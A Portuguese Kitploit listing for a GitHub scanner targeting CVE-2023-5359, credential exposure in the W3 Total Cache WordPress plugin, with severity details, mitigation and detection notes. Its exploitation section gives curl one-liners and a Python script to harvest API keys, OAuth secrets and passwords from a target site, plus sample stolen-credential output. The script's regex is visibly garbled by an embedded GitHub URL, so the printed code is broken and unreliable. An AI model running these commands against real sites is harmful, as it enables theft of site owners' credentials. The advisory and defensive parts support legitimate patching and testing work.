Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-5359 — CVE-2023-5359 - Scanner de Vulnerabilidade de Armazenamento em Texto Claro do W3 Total Cache. Detecte credenciais expostas nas versões do plugin W3 Total Cache ≤ 2.7.5. | Kitploit
Ferramentas/GitHubGitHub/enzocipher/cve-2023-5359
Scanners de VulnerabilidadesAtaques de SenhaExploraçãoColeta de InformaçõesSegurança WebAprendizado e Educação
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - Scanner de Vulnerabilidade de Armazenamento em Texto Claro do W3 Total Cache. Detecte credenciais expostas nas versões do plugin W3 Total Cache ≤ 2.7.5.

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-5359 - Vulnerabilidade de Armazenamento em Texto Claro do W3 Total Cache

Descrição

CVE-2023-5359 é uma vulnerabilidade de armazenamento em texto claro que afeta o plugin WordPress W3 Total Cache nas versões ≤ 2.7.5. Esta vulnerabilidade permite que atacantes remotos acessem credenciais sensíveis armazenadas em arquivos PHP não criptografados que são publicamente acessíveis.

Gravidade

  • Pontuação CVSS: 7.5 (Alta)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Tipo: Exposição de Informações Sensíveis

Vulnerabilidade Técnica

Causa Raiz

O W3 Total Cache armazena configurações e credenciais de API em arquivos PHP no diretório /wp-content/plugins/w3-total-cache/ sem proteção adequada. Esses arquivos são acessíveis via HTTP, expondo:

  • Chaves de API (CloudFlare, Google, etc.)
  • Segredos do Cliente
  • Tokens OAuth
  • Credenciais de serviços externos

Arquivos Afetados

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Exploração

Método Manual

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script Automatizado

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impacto

Um atacante pode obter:

  1. Credenciais CloudFlare - Assumir controle de CDN e DNS
  2. Chaves de API para serviços externos - Acessar contas externas
  3. Tokens OAuth - Fingir identidade
  4. Configurações de cache - Manipular conteúdo servido

Mitigação

Solução Imediata

  1. Atualizar para W3 Total Cache ≥ 2.7.6
  2. Restringir acesso a arquivos PHP no diretório de plugins
  3. Revogar e regenerar todas as credenciais expostas

Configuração Segura

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Detecção

Comando de Verificação

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicadores de Comprometimento

  • Atividade incomum em APIs externas
  • Alterações nas configurações do CloudFlare
  • Tráfego de IPs não autorizados para serviços conectados

Exemplo de Descoberta

root@kitploit:~
[*] Escaneando: https://example.com
[+] W3 Total Cache detectado
[+] Arquivo acessível: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENCIAIS ENCONTRADAS:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Referências

  • CVE-2023-5359
  • Registro de alterações do W3 Total Cache
  • Equipe de Segurança do WordPress

Aviso Legal

Este repositório é apenas para fins educacionais e testes de penetração autorizados. O uso malicioso destas informações é estritamente proibido.


Achou esta informação útil? Dê uma estrela no repositório!

Última atualização: Novembro de 2025

Baixar ferramenta